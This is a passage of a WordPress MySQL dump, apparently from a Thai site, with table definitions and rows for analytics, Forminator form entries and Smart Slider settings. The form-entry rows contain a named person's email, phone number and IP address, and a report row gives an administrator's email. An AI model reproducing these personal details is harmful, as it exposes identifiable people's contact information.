  `interaction_type` enum('impression','click','view','play','pause','complete') NOT NULL DEFAULT 'impression',
  `interaction_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`interaction_data`)),
  `view_duration` int(11) unsigned DEFAULT 0,
  `created_at` datetime DEFAULT current_timestamp(),
  PRIMARY KEY (`id`),
  KEY `idx_content_id` (`content_id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_session_id` (`session_id`),
  KEY `idx_interaction_type` (`interaction_type`),
  KEY `idx_created_at` (`created_at`),
  KEY `idx_user_ip` (`user_ip`),
  KEY `idx_content_interaction` (`content_id`,`interaction_type`),
  KEY `idx_daily_stats` (`content_id`,`interaction_type`,`created_at`),
  KEY `idx_user_content_interaction` (`user_id`,`content_id`,`interaction_type`),
  KEY `idx_deduplication` (`user_id`,`content_id`,`interaction_type`,`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_embedpress_analytics_views`
--

LOCK TABLES `wp_embedpress_analytics_views` WRITE;
/*!40000 ALTER TABLE `wp_embedpress_analytics_views` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_embedpress_analytics_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_entry` (
  `entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_type` varchar(191) NOT NULL,
  `draft_id` varchar(12) DEFAULT NULL,
  `form_id` bigint(20) unsigned NOT NULL,
  `is_spam` tinyint(1) NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`entry_id`),
  KEY `entry_is_spam` (`is_spam`),
  KEY `entry_type` (`entry_type`),
  KEY `entry_form_id` (`form_id`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry`
--

LOCK TABLES `wp_frmt_form_entry` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_entry` VALUES
(1,'custom-forms',NULL,1416,0,'2025-07-01 09:35:19'),
(2,'poll',NULL,1516,0,'2025-07-01 10:59:31'),
(3,'poll',NULL,1516,0,'2025-07-01 11:00:02'),
(4,'poll',NULL,1516,0,'2025-07-01 11:15:58'),
(5,'poll',NULL,1516,0,'2025-07-01 11:18:24'),
(6,'poll',NULL,1516,0,'2025-07-02 11:09:02'),
(7,'custom-forms',NULL,1416,0,'2025-07-07 08:26:05');
/*!40000 ALTER TABLE `wp_frmt_form_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry_meta`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_entry_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(191) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`),
  KEY `meta_entry_id` (`entry_id`),
  KEY `meta_key_object` (`entry_id`,`meta_key`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry_meta`
--

LOCK TABLES `wp_frmt_form_entry_meta` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_entry_meta` VALUES
(1,1,'name-1','ปรีชา ศรีลาตรี','2025-07-01 09:35:19','0000-00-00 00:00:00'),
(2,1,'email-1','111@gmail.com','2025-07-01 09:35:19','0000-00-00 00:00:00'),
(3,1,'phone-1','0868733992','2025-07-01 09:35:19','0000-00-00 00:00:00'),
(4,1,'textarea-1','test','2025-07-01 09:35:19','0000-00-00 00:00:00'),
(5,1,'_forminator_user_ip','106.0.143.177','2025-07-01 09:35:19','0000-00-00 00:00:00'),
(6,2,'answer-2','พอใจมาก','2025-07-01 10:59:31','0000-00-00 00:00:00'),
(7,3,'answer-1','พอใจมากที่สุด','2025-07-01 11:00:02','0000-00-00 00:00:00'),
(8,4,'answer-1','พอใจมากที่สุด','2025-07-01 11:15:58','0000-00-00 00:00:00'),
(9,5,'answer-1','พอใจมากที่สุด','2025-07-01 11:18:24','0000-00-00 00:00:00'),
(10,6,'answer-1','พอใจมากที่สุด','2025-07-02 11:09:02','0000-00-00 00:00:00'),
(11,7,'name-1','ปรีชา ศรีลาตรี','2025-07-07 08:26:05','0000-00-00 00:00:00'),
(12,7,'email-1','ืีnutkubp@gmail.com','2025-07-07 08:26:05','0000-00-00 00:00:00'),
(13,7,'phone-1','1234567890','2025-07-07 08:26:06','0000-00-00 00:00:00'),
(14,7,'textarea-1','test','2025-07-07 08:26:06','0000-00-00 00:00:00'),
(15,7,'checkbox-1','ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น, ข้อมูลผู้ร้องเรียนจะถูกเข้าถึงโดยเจ้าหน้าที่ที่เกี่ยวข้องเท่านั้น, ข้อมูลจะถูกเก็บไว้เป็นระยเวลา 1 ปี หลังจากดำเนินการเสร็จสิ้น, ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ','2025-07-07 08:26:06','0000-00-00 00:00:00'),
(16,7,'_forminator_user_ip','106.0.143.177','2025-07-07 08:26:06','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_reports`
--

DROP TABLE IF EXISTS `wp_frmt_form_reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_reports` (
  `report_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `report_value` longtext NOT NULL,
  `status` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`report_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_reports`
--

LOCK TABLES `wp_frmt_form_reports` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_reports` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_reports` VALUES
(1,'a:5:{s:7:\"exclude\";a:1:{i:0;i:1;}s:8:\"settings\";a:3:{s:5:\"label\";s:12:\"Form reports\";s:6:\"module\";s:5:\"forms\";s:10:\"forms_type\";s:3:\"all\";}s:8:\"schedule\";a:3:{s:9:\"frequency\";s:7:\"monthly\";s:8:\"monthDay\";s:1:\"4\";s:9:\"monthTime\";s:8:\"04:00 AM\";}s:13:\"report_status\";s:8:\"inactive\";s:10:\"recipients\";a:1:{i:0;a:5:{s:2:\"id\";i:1;s:4:\"name\";s:5:\"admin\";s:5:\"email\";s:20:\"patcharapol@ro.ac.th\";s:4:\"role\";s:13:\"Administrator\";s:6:\"avatar\";s:113:\"https://secure.gravatar.com/avatar/90ff9e86b1e891a75ed43267546a356dea7577108674510b9a18537f3eb6200b?s=96&d=mm&r=g\";}}}','inactive','2025-05-21 12:15:40','2025-05-21 12:15:40');
/*!40000 ALTER TABLE `wp_frmt_form_reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_views`
--

DROP TABLE IF EXISTS `wp_frmt_form_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_views` (
  `view_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned NOT NULL,
  `page_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(191) DEFAULT NULL,
  `count` mediumint(8) unsigned NOT NULL DEFAULT 1,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`view_id`),
  KEY `view_form_id` (`form_id`),
  KEY `view_ip` (`ip`),
  KEY `view_form_object` (`form_id`,`view_id`),
  KEY `view_form_object_ip` (`form_id`,`view_id`,`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=63 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_views`
--

LOCK TABLES `wp_frmt_form_views` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_views` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_views` VALUES
(15,1416,0,NULL,1,'2025-06-25 10:38:35','0000-00-00 00:00:00'),
(16,1416,476,NULL,3,'2025-06-25 10:46:25','2025-06-25 11:56:12'),
(17,1416,476,NULL,2,'2025-06-26 04:30:02','2025-06-26 06:53:07'),
(18,1416,476,NULL,2,'2025-06-27 14:57:29','2025-06-27 20:30:41'),
(20,1416,476,NULL,2,'2025-06-28 06:57:23','2025-06-28 14:04:02'),
(22,1416,476,NULL,2,'2025-06-30 02:20:00','2025-06-30 09:01:20'),
(23,1416,476,NULL,15,'2025-07-01 09:33:42','2025-07-01 13:56:43'),
(24,1506,484,NULL,1,'2025-07-01 10:17:44','0000-00-00 00:00:00'),
(25,1516,1523,NULL,7,'2025-07-01 10:52:34','2025-07-01 11:17:35'),
(26,1528,0,NULL,4,'2025-07-01 11:31:39','2025-07-01 11:47:44'),
(27,1506,484,NULL,2,'2025-07-02 10:58:22','2025-07-02 11:04:20'),
(28,1416,476,NULL,2,'2025-07-02 10:59:02','2025-07-02 12:02:39'),
(29,1516,1523,NULL,1,'2025-07-02 11:08:56','0000-00-00 00:00:00'),
(30,1416,1611,NULL,1,'2025-07-03 07:32:57','0000-00-00 00:00:00'),
(31,1506,484,NULL,4,'2025-07-03 09:45:49','2025-07-03 14:21:07'),
(32,1416,476,NULL,2,'2025-07-03 15:06:47','2025-07-03 15:07:31'),
(33,1516,1523,NULL,3,'2025-07-04 09:05:10','2025-07-04 14:50:11'),
(34,1416,476,NULL,1,'2025-07-05 08:58:06','0000-00-00 00:00:00'),
(35,1416,1611,NULL,1,'2025-07-06 23:25:09','0000-00-00 00:00:00'),
(36,1516,1523,NULL,1,'2025-07-07 02:39:17','0000-00-00 00:00:00'),
(37,1416,476,NULL,5,'2025-07-07 08:22:19','2025-07-07 09:02:35'),
(38,1416,1611,NULL,1,'2025-07-07 14:15:29','0000-00-00 00:00:00'),
(39,1516,1523,NULL,1,'2025-07-11 05:11:29','0000-00-00 00:00:00'),
(40,1516,1523,NULL,3,'2025-07-12 00:51:30','2025-07-12 09:18:42'),
(41,1516,1523,NULL,1,'2025-07-14 15:07:35','0000-00-00 00:00:00'),
(42,1516,1523,NULL,1,'2025-07-15 10:24:21','0000-00-00 00:00:00'),
(43,1516,1523,NULL,1,'2025-07-16 09:37:06','0000-00-00 00:00:00'),
(44,1516,1523,NULL,1,'2025-07-21 13:27:04','0000-00-00 00:00:00'),
(45,1516,1523,NULL,1,'2025-07-23 17:32:57','0000-00-00 00:00:00'),
(46,1516,1523,NULL,1,'2025-07-24 01:10:15','0000-00-00 00:00:00'),
(47,1516,1523,NULL,1,'2025-07-28 10:14:37','0000-00-00 00:00:00'),
(48,1516,1523,NULL,1,'2025-07-31 10:11:36','0000-00-00 00:00:00'),
(49,1516,1523,NULL,1,'2025-08-05 06:19:40','0000-00-00 00:00:00'),
(50,1516,1523,NULL,1,'2025-08-06 18:25:24','0000-00-00 00:00:00'),
(51,1516,1523,NULL,1,'2025-08-13 00:06:58','0000-00-00 00:00:00'),
(52,1516,1523,NULL,1,'2025-08-14 01:13:41','0000-00-00 00:00:00'),
(53,1516,1523,NULL,2,'2025-08-15 05:17:11','2025-08-15 05:20:07'),
(54,1516,1523,NULL,1,'2025-08-29 19:37:21','0000-00-00 00:00:00'),
(55,1516,1523,NULL,1,'2025-08-31 19:46:44','0000-00-00 00:00:00'),
(56,1516,1523,NULL,2,'2025-09-11 08:18:14','2025-09-11 07:55:58'),
(57,1516,1523,NULL,2,'2025-09-13 22:27:00','2025-09-13 17:16:28'),
(58,1516,1523,NULL,1,'2025-09-16 00:55:47','0000-00-00 00:00:00'),
(59,1516,1523,NULL,2,'2025-09-20 14:33:36','2025-09-20 07:45:49'),
(60,1516,1523,NULL,1,'2025-09-21 09:42:25','0000-00-00 00:00:00'),
(61,1516,1523,NULL,1,'2025-09-23 15:10:09','0000-00-00 00:00:00'),
(62,1516,1523,NULL,1,'2025-09-24 14:29:29','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_frmt_form_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_image_storage`
--

DROP TABLE IF EXISTS `wp_nextend2_image_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_image_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) NOT NULL,
  `image` text NOT NULL,
  `value` mediumtext NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `hash` (`hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_image_storage`
--

LOCK TABLES `wp_nextend2_image_storage` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_image_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_image_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_section_storage`
--

DROP TABLE IF EXISTS `wp_nextend2_section_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_section_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `application` varchar(20) NOT NULL,
  `section` varchar(128) NOT NULL,
  `referencekey` varchar(128) NOT NULL,
  `value` mediumtext NOT NULL,
  `isSystem` int(11) NOT NULL DEFAULT 0,
  `editable` int(11) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `isSystem` (`isSystem`),
  KEY `editable` (`editable`),
  KEY `application` (`application`,`section`(50),`referencekey`(50)),
  KEY `application_2` (`application`,`section`(50))
) ENGINE=InnoDB AUTO_INCREMENT=10003 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_section_storage`
--

LOCK TABLES `wp_nextend2_section_storage` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_section_storage` DISABLE KEYS */;
INSERT INTO `wp_nextend2_section_storage` VALUES
(10000,'smartslider','settings','','{\"n2_ss3_version\":\"3.5.1.19\\/b:release-3.5.1.19\\/r:4e06d1a7c4bae6a4e54c585b3749e7c169b51386\"}',0,1),
(10001,'smartslider','license','isActive','0',0,1),
(10002,'smartslider','license','key','',0,1);
/*!40000 ALTER TABLE `wp_nextend2_section_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_generators`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_generators`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_generators` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `group` varchar(254) NOT NULL,
  `type` varchar(254) NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_generators`
--

LOCK TABLES `wp_nextend2_smartslider3_generators` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_generators` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_generators` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_sliders`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_sliders` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `alias` text DEFAULT NULL,
  `title` text NOT NULL,
  `type` varchar(30) NOT NULL,
  `params` mediumtext NOT NULL,
  `slider_status` varchar(50) NOT NULL DEFAULT 'published',
  `time` datetime NOT NULL,
  `thumbnail` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `slider_status` (`slider_status`),
  KEY `time` (`time`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_sliders`
--

LOCK TABLES `wp_nextend2_smartslider3_sliders` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders` DISABLE KEYS */;
INSERT INTO `wp_nextend2_smartslider3_sliders` VALUES
(1,NULL,'Tutorial Slider','simple','{\"aria-label\":\"Slider\",\"alias-id\":\"\",\"alias-smoothscroll\":\"\",\"alias-slideswitch\":\"\",\"background\":\"\",\"background-fixed\":\"0\",\"background-size\":\"cover\",\"background-color\":\"FFFFFF00\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"backgroundVideoMode\":\"fill\",\"align\":\"normal\",\"margin\":\"0|*|0|*|0|*|0\",\"padding\":\"0|*|0|*|0|*|0\",\"perspective\":\"1000\",\"border-width\":\"0\",\"border-color\":\"3E3E3Eff\",\"border-radius\":\"0\",\"slider-preset\":\"\",\"slider-css\":\"\",\"width\":\"1200\",\"height\":\"600\",\"mobileportrait\":\"1\",\"mobilelandscape\":\"1\",\"tabletportrait\":\"1\",\"tabletlandscape\":\"1\",\"desktopportrait\":\"1\",\"desktoplandscape\":\"1\",\"responsiveLimitSlideWidth\":\"1\",\"responsiveSlideWidthDesktopLandscape\":\"0\",\"responsiveSlideWidthMaxDesktopLandscape\":\"1600\",\"responsiveSlideWidth\":\"0\",\"responsiveSlideWidthMax\":\"3000\",\"responsiveSlideWidthTabletLandscape\":\"0\",\"responsiveSlideWidthMaxTabletLandscape\":\"1200\",\"responsiveSlideWidthTablet\":\"0\",\"responsiveSlideWidthMaxTablet\":\"3000\",\"responsiveSlideWidthMobileLandscape\":\"0\",\"responsiveSlideWidthMaxMobileLandscape\":\"740\",\"responsiveSlideWidthMobile\":\"0\",\"responsiveSlideWidthMaxMobile\":\"480\",\"responsive-breakpoint-desktop-portrait\":\"1440\",\"responsive-breakpoint-desktop-portrait-landscape\":\"1440\",\"responsive-breakpoint-tablet-landscape\":\"1300\",\"responsive-breakpoint-tablet-landscape-landscape\":\"1300\",\"responsive-breakpoint-tablet-portrait\":\"1199\",\"responsive-breakpoint-tablet-portrait-landscape\":\"1199\",\"responsive-breakpoint-mobile-landscape\":\"900\",\"responsive-breakpoint-mobile-landscape-landscape\":\"1050\",\"responsive-breakpoint-mobile-portrait\":\"700\",\"responsive-breakpoint-mobile-portrait-landscape\":\"900\",\"responsive-breakpoint-desktop-landscape-enabled\":\"0\",\"responsive-breakpoint-tablet-landscape-enabled\":\"0\",\"responsive-breakpoint-tablet-portrait-enabled\":\"1\",\"responsive-breakpoint-mobile-landscape-enabled\":\"0\",\"responsive-breakpoint-mobile-portrait-enabled\":\"1\",\"responsive-breakpoint-global\":\"0\",\"breakpoints-orientation\":\"portrait\",\"responsive-mode\":\"fullwidth\",\"responsiveSliderHeightMin\":\"0\",\"responsiveForceFull\":\"1\",\"responsiveForceFullOverflowX\":\"body\",\"responsiveForceFullHorizontalSelector\":\"body\",\"slider-size-override\":\"0\",\"slider-size-override-mobile-portrait\":\"0\",\"mobile-portrait-width\":\"320\",\"mobile-portrait-height\":\"568\",\"slider-size-override-mobile-landscape\":\"0\",\"mobile-landscape-width\":\"568\",\"mobile-landscape-height\":\"320\",\"slider-size-override-tablet-portrait\":\"0\",\"tablet-portrait-width\":\"768\",\"tablet-portrait-height\":\"1024\",\"slider-size-override-tablet-landscape\":\"0\",\"tablet-landscape-width\":\"1024\",\"tablet-landscape-height\":\"768\",\"slider-size-override-desktop-landscape\":\"0\",\"desktop-landscape-width\":\"1440\",\"desktop-landscape-height\":\"900\",\"controlsTouch\":\"horizontal\",\"controlsScroll\":\"0\",\"controlsKeyboard\":\"1\",\"widget-arrow-enabled\":\"0\",\"widgetarrow\":\"imageEmpty\",\"widget-arrow-previous\":\"thin-horizontal.svg\",\"widget-arrow-previous-image\":\"\",\"widget-arrow-previous-color\":\"ffffffcc\",\"widget-arrow-previous-hover\":\"1\",\"widget-arrow-previous-hover-color\":\"ffffffff\",\"widget-arrow-mirror\":\"1\",\"widget-arrow-next\":\"thin-horizontal.svg\",\"widget-arrow-next-image\":\"\",\"widget-arrow-next-color\":\"ffffffcc\",\"widget-arrow-next-hover\":\"0\",\"widget-arrow-next-hover-color\":\"ffffffcc\",\"widget-arrow-style\":\"\",\"widget-arrow-previous-position-mode\":\"simple\",\"widget-arrow-previous-position-area\":\"6\",\"widget-arrow-previous-position-stack\":\"1\",\"widget-arrow-previous-position-offset\":\"15\",\"widget-arrow-previous-position-horizontal\":\"left\",\"widget-arrow-previous-position-horizontal-position\":\"0\",\"widget-arrow-previous-position-horizontal-unit\":\"px\",\"widget-arrow-previous-position-vertical\":\"top\",\"widget-arrow-previous-position-vertical-position\":\"0\",\"widget-arrow-previous-position-vertical-unit\":\"px\",\"widget-arrow-next-position-mode\":\"simple\",\"widget-arrow-next-position-area\":\"7\",\"widget-arrow-next-position-stack\":\"1\",\"widget-arrow-next-position-offset\":\"15\",\"widget-arrow-next-position-horizontal\":\"left\",\"widget-arrow-next-position-horizontal-position\":\"0\",\"widget-arrow-next-position-horizontal-unit\":\"px\",\"widget-arrow-next-position-vertical\":\"top\",\"widget-arrow-next-position-vertical-position\":\"0\",\"widget-arrow-next-position-vertical-unit\":\"px\",\"widget-arrow-animation\":\"fade\",\"widget-arrow-previous-alt\":\"previous arrow\",\"widget-arrow-next-alt\":\"next arrow\",\"widget-arrow-base64\":\"1\",\"widget-arrow-display-hover\":\"0\",\"widget-arrow-display-mobileportrait\":\"0\",\"widget-arrow-display-mobilelandscape\":\"0\",\"widget-arrow-display-tabletportrait\":\"1\",\"widget-arrow-display-tabletlandscape\":\"1\",\"widget-arrow-display-desktopportrait\":\"1\",\"widget-arrow-display-desktoplandscape\":\"1\",\"widget-arrow-exclude-slides\":\"\",\"widget-bullet-enabled\":\"1\",\"widgetbullet\":\"transition\",\"widget-bullet-position-mode\":\"simple\",\"widget-bullet-position-area\":\"10\",\"widget-bullet-position-stack\":\"1\",\"widget-bullet-position-offset\":\"5\",\"widget-bullet-position-horizontal\":\"left\",\"widget-bullet-position-horizontal-position\":\"0\",\"widget-bullet-position-horizontal-unit\":\"px\",\"widget-bullet-position-vertical\":\"top\",\"widget-bullet-position-vertical-position\":\"0\",\"widget-bullet-position-vertical-unit\":\"px\",\"widget-bullet-action\":\"click\",\"widget-bullet-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000000\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"5|*|5|*|5|*|5|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"2|*|solid|*|ffffffcc\\\",\\\"borderradius\\\":\\\"50\\\",\\\"extra\\\":\\\"margin: 4px;\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffcc\\\",\\\"border\\\":\\\"2|*|solid|*|ffffffcc\\\"}]}\",\"widget-bullet-bar\":\"\",\"widget-bullet-bar-full-size\":\"0\",\"widget-bullet-align\":\"center\",\"widget-bullet-orientation\":\"auto\",\"widget-bullet-thumbnail-show-image\":\"0\",\"widget-bullet-thumbnail-width\":\"60\",\"widget-bullet-thumbnail-height\":\"60\",\"widget-bullet-thumbnail-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000080\\\",\\\"padding\\\":\\\"3|*|3|*|3|*|3|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"margin: 5px;\\\"}]}\",\"widget-bullet-thumbnail-side\":\"before\",\"widget-bullet-display-hover\":\"0\",\"widget-bullet-display-mobileportrait\":\"1\",\"widget-bullet-display-mobilelandscape\":\"1\",\"widget-bullet-display-tabletportrait\":\"1\",\"widget-bullet-display-tabletlandscape\":\"1\",\"widget-bullet-display-desktopportrait\":\"1\",\"widget-bullet-display-desktoplandscape\":\"1\",\"widget-bullet-exclude-slides\":\"\",\"widget-bar-enabled\":\"0\",\"widgetbar\":\"horizontal\",\"widget-bar-position-mode\":\"simple\",\"widget-bar-position-area\":\"10\",\"widget-bar-position-stack\":\"1\",\"widget-bar-position-offset\":\"30\",\"widget-bar-position-horizontal\":\"left\",\"widget-bar-position-horizontal-position\":\"0\",\"widget-bar-position-horizontal-unit\":\"px\",\"widget-bar-position-vertical\":\"top\",\"widget-bar-position-vertical-position\":\"0\",\"widget-bar-position-vertical-unit\":\"px\",\"widget-bar-animate\":\"0\",\"widget-bar-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"5|*|20|*|5|*|20|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"40\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-bar-show-title\":\"1\",\"widget-bar-font-title\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000c7\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\",\\\"extra\\\":\\\"vertical-align: middle;\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-bar-show-description\":\"1\",\"widget-bar-font-description\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000c7\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":1,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\",\\\"extra\\\":\\\"vertical-align: 